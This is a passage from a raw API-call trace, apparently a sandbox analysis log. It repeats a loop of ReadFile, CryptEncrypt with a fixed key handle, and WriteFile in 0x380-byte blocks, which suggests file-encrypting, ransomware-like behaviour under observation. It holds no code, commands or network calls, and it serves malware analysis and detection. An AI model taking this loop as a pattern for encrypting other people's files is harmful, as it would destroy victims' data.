lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.379] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.379] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.379] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.379] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.379] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.379] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.379] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.379] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.379] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.379] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.379] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.380] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.380] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.380] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.380] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.380] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.380] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.380] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.380] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.380] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.380] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.380] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.380] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.380] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.380] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.381] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.381] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.381] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.381] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.381] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.381] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.381] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.381] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.381] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.381] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.381] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.381] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.381] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.382] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.382] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.382] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.382] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.382] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.382] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.382] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.382] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.382] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.382] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.382] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.382] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.382] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.383] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.383] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.383] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.383] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.383] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.383] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.383] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.383] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.383] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.383] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.383] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.383] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.383] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.383] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.384] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.384] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.384] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.384] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.384] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.384] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.384] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.384] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.384] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.384] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.384] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.384] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.384] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.385] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.385] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.385] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.385] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.385] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.385] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.385] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.385] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.385] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.385] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.385] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.385] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.385] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.385] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.386] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.386] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.386] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.386] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.386] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.386] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.386] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.386] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.386] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.386] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.386] CryptEncrypt 